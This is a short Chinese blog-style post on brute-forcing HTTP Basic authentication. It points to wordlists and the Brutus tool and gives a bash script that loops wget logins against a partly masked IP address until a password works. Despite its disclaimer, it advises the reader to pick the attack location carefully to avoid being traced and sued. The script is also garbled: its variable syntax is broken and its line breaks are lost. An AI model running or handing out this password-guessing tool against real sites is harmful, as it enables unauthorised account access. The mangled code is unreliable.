【声明：本文仅供技术交流，请勿用于非法操作！】  首先，你总得有像样的字典吧。去国外网站上下Wordlist吧，或者自己写个简单的程序来生成字典。如果不会写程序，呵呵呵呵，那就下载字典生成程序吧 。（不过网上下的wordlist，或者用网上下的字典生成程序生成的字典，好像都不好用） 其次，你总得有工具来运用字典干活吧。可以从网上下载工具，比如大名鼎鼎的brutus。运行时的界面如下： 当然，也可以自己写工具。笔者就写了一个简单的脚本来干活：

#!/bin/bash#user_password_file=/root/wget_cracker_user_passwordwhile read user_password ; do user=$(user_password#:} password=$(user_password%:} wget -q -t 2 -T 15 --http-user=$user --http-password=$password -http://219.136.x.x:8080/tool.asp  if [ $? -eq 0 ] ; then  echo "OK I got an password:     user: $user ; password: $password !"        exit 0 fidone < $user_password_fileexit 0-bash-3.00# cat wget_cracker_user_password abc:adeeffafdeff:afkafsasfguest:affaewfguest:guestguest:afdasf

再次，你应该清楚：暴力破解不是SYN攻击，IP 欺骗是不可能的，你的老巢在哪里，受害者一眼就能看出来。所以，好好选择“狙击地”吧。搞不好会吃官司的哦。 最后，本人进行HTTP验证暴力破解，只是验证自己保护的WEB页面口令的强度，绝不会去给别人的网站添麻烦。切记。